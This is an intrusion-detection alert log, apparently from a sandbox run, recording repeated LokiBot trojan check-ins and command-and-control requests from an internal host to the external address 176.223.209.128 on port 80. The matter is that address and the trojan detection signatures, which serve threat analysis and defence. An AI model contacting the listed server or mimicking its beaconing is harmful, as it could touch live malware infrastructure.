                                              11/25/21-10:51:19.166859TCP2025381ET TROJAN LokiBot Checkin5021480192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.166859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021480192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.718417TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021580192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.718417TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021580192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.718417TCP2025381ET TROJAN LokiBot Checkin5021580192.168.11.20176.223.209.128
                                              11/25/21-10:51:19.718417TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021580192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.224991TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021680192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.224991TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021680192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.224991TCP2025381ET TROJAN LokiBot Checkin5021680192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.224991TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021680192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.725136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021780192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.725136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021780192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.725136TCP2025381ET TROJAN LokiBot Checkin5021780192.168.11.20176.223.209.128
                                              11/25/21-10:51:20.725136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021780192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.156398TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021880192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.156398TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021880192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.156398TCP2025381ET TROJAN LokiBot Checkin5021880192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.156398TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021880192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.660669TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021980192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.660669TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021980192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.660669TCP2025381ET TROJAN LokiBot Checkin5021980192.168.11.20176.223.209.128
                                              11/25/21-10:51:21.660669TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021980192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.171066TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022080192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.171066TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022080192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.171066TCP2025381ET TROJAN LokiBot Checkin5022080192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.171066TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022080192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.650390TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022180192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.650390TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022180192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.650390TCP2025381ET TROJAN LokiBot Checkin5022180192.168.11.20176.223.209.128
                                              11/25/21-10:51:22.650390TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022180192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.144422TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022280192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.144422TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022280192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.144422TCP2025381ET TROJAN LokiBot Checkin5022280192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.144422TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022280192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.652940TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022380192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.652940TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022380192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.652940TCP2025381ET TROJAN LokiBot Checkin5022380192.168.11.20176.223.209.128
                                              11/25/21-10:51:23.652940TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022380192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.110114TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022480192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.110114TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022480192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.110114TCP2025381ET TROJAN LokiBot Checkin5022480192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.110114TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022480192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.605768TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022580192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.605768TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022580192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.605768TCP2025381ET TROJAN LokiBot Checkin5022580192.168.11.20176.223.209.128
                                              11/25/21-10:51:24.605768TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022580192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.134458TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022680192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.134458TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022680192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.134458TCP2025381ET TROJAN LokiBot Checkin5022680192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.134458TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022680192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.644833TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022780192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.644833TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022780192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.644833TCP2025381ET TROJAN LokiBot Checkin5022780192.168.11.20176.223.209.128
                                              11/25/21-10:51:25.644833TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022780192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.123164TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022880192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.123164TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022880192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.123164TCP2025381ET TROJAN LokiBot Checkin5022880192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.123164TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022880192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.626690TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022980192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.626690TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022980192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.626690TCP2025381ET TROJAN LokiBot Checkin5022980192.168.11.20176.223.209.128
                                              11/25/21-10:51:26.626690TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022980192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.099310TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023080192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.099310TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023080192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.099310TCP2025381ET TROJAN LokiBot Checkin5023080192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.099310TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023080192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.588196TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023180192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.588196TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023180192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.588196TCP2025381ET TROJAN LokiBot Checkin5023180192.168.11.20176.223.209.128
                                              11/25/21-10:51:27.588196TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023180192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.063644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023280192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.063644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023280192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.063644TCP2025381ET TROJAN LokiBot Checkin5023280192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.063644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023280192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.555425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023380192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.555425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023380192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.555425TCP2025381ET TROJAN LokiBot Checkin5023380192.168.11.20176.223.209.128
                                              11/25/21-10:51:28.555425TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023380192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.050192TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023480192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.050192TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023480192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.050192TCP2025381ET TROJAN LokiBot Checkin5023480192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.050192TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023480192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.546638TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023580192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.546638TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023580192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.546638TCP2025381ET TROJAN LokiBot Checkin5023580192.168.11.20176.223.209.128
                                              11/25/21-10:51:29.546638TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023580192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.065751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023680192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.065751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023680192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.065751TCP2025381ET TROJAN LokiBot Checkin5023680192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.065751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023680192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.571082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023780192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.571082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023780192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.571082TCP2025381ET TROJAN LokiBot Checkin5023780192.168.11.20176.223.209.128
                                              11/25/21-10:51:30.571082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023780192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.087433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023880192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.087433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023880192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.087433TCP2025381ET TROJAN LokiBot Checkin5023880192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.087433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023880192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.605421TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023980192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.605421TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023980192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.605421TCP2025381ET TROJAN LokiBot Checkin5023980192.168.11.20176.223.209.128
                                              11/25/21-10:51:31.605421TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023980192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.121427TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024080192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.121427TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024080192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.121427TCP2025381ET TROJAN LokiBot Checkin5024080192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.121427TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024080192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.627208TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024180192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.627208TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024180192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.627208TCP2025381ET TROJAN LokiBot Checkin5024180192.168.11.20176.223.209.128
                                              11/25/21-10:51:32.627208TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024180192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.085055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024280192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.085055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024280192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.085055TCP2025381ET TROJAN LokiBot Checkin5024280192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.085055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024280192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.603281TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024380192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.603281TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024380192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.603281TCP2025381ET TROJAN LokiBot Checkin5024380192.168.11.20176.223.209.128
                                              11/25/21-10:51:33.603281TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024380192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.090457TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024480192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.090457TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024480192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.090457TCP2025381ET TROJAN LokiBot Checkin5024480192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.090457TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024480192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.587918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024580192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.587918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024580192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.587918TCP2025381ET TROJAN LokiBot Checkin5024580192.168.11.20176.223.209.128
                                              11/25/21-10:51:34.587918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024580192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.114157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024680192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.114157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024680192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.114157TCP2025381ET TROJAN LokiBot Checkin5024680192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.114157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024680192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.578964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024780192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.578964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024780192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.578964TCP2025381ET TROJAN LokiBot Checkin5024780192.168.11.20176.223.209.128
                                              11/25/21-10:51:35.578964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024780192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.082511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024880192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.082511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024880192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.082511TCP2025381ET TROJAN LokiBot Checkin5024880192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.082511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024880192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.600596TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15024980192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.600596TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5024980192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.600596TCP2025381ET TROJAN LokiBot Checkin5024980192.168.11.20176.223.209.128
                                              11/25/21-10:51:36.600596TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25024980192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.097490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025080192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.097490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025080192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.097490TCP2025381ET TROJAN LokiBot Checkin5025080192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.097490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025080192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.589318TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025180192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.589318TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025180192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.589318TCP2025381ET TROJAN LokiBot Checkin5025180192.168.11.20176.223.209.128
                                              11/25/21-10:51:37.589318TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025180192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.094882TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025280192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.094882TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025280192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.094882TCP2025381ET TROJAN LokiBot Checkin5025280192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.094882TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025280192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.599425TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025380192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.599425TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025380192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.599425TCP2025381ET TROJAN LokiBot Checkin5025380192.168.11.20176.223.209.128
                                              11/25/21-10:51:38.599425TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025380192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.110252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025480192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.110252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025480192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.110252TCP2025381ET TROJAN LokiBot Checkin5025480192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.110252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025480192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.626539TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025580192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.626539TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025580192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.626539TCP2025381ET TROJAN LokiBot Checkin5025580192.168.11.20176.223.209.128
                                              11/25/21-10:51:39.626539TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025580192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.142402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025680192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.142402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025680192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.142402TCP2025381ET TROJAN LokiBot Checkin5025680192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.142402TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025680192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.656007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025780192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.656007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025780192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.656007TCP2025381ET TROJAN LokiBot Checkin5025780192.168.11.20176.223.209.128
                                              11/25/21-10:51:40.656007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025780192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.141474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025880192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.141474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025880192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.141474TCP2025381ET TROJAN LokiBot Checkin5025880192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.141474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025880192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.613563TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15025980192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.613563TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5025980192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.613563TCP2025381ET TROJAN LokiBot Checkin5025980192.168.11.20176.223.209.128
                                              11/25/21-10:51:41.613563TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25025980192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.168918TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026080192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.168918TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026080192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.168918TCP2025381ET TROJAN LokiBot Checkin5026080192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.168918TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026080192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.653882TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026180192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.653882TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026180192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.653882TCP2025381ET TROJAN LokiBot Checkin5026180192.168.11.20176.223.209.128
                                              11/25/21-10:51:42.653882TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026180192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.154212TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026280192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.154212TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026280192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.154212TCP2025381ET TROJAN LokiBot Checkin5026280192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.154212TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026280192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.663133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026380192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.663133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026380192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.663133TCP2025381ET TROJAN LokiBot Checkin5026380192.168.11.20176.223.209.128
                                              11/25/21-10:51:43.663133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026380192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.124896TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026480192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.124896TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026480192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.124896TCP2025381ET TROJAN LokiBot Checkin5026480192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.124896TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026480192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.645263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026580192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.645263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026580192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.645263TCP2025381ET TROJAN LokiBot Checkin5026580192.168.11.20176.223.209.128
                                              11/25/21-10:51:44.645263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026580192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.106868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026680192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.106868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026680192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.106868TCP2025381ET TROJAN LokiBot Checkin5026680192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.106868TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026680192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.594589TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026780192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.594589TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026780192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.594589TCP2025381ET TROJAN LokiBot Checkin5026780192.168.11.20176.223.209.128
                                              11/25/21-10:51:45.594589TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026780192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.101808TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026880192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.101808TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026880192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.101808TCP2025381ET TROJAN LokiBot Checkin5026880192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.101808TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026880192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.597646TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15026980192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.597646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5026980192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.597646TCP2025381ET TROJAN LokiBot Checkin5026980192.168.11.20176.223.209.128
                                              11/25/21-10:51:46.597646TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25026980192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.109619TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027080192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.109619TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027080192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.109619TCP2025381ET TROJAN LokiBot Checkin5027080192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.109619TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027080192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.611890TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027180192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.611890TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027180192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.611890TCP2025381ET TROJAN LokiBot Checkin5027180192.168.11.20176.223.209.128
                                              11/25/21-10:51:47.611890TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25027180192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.126751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15027280192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.126751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5027280192.168.11.20176.223.209.128
                                              11/25/21-10:51:48.126751TCP2025381ET TROJAN LokiBot Checkin5027280192.168.11.20176.223.209.128
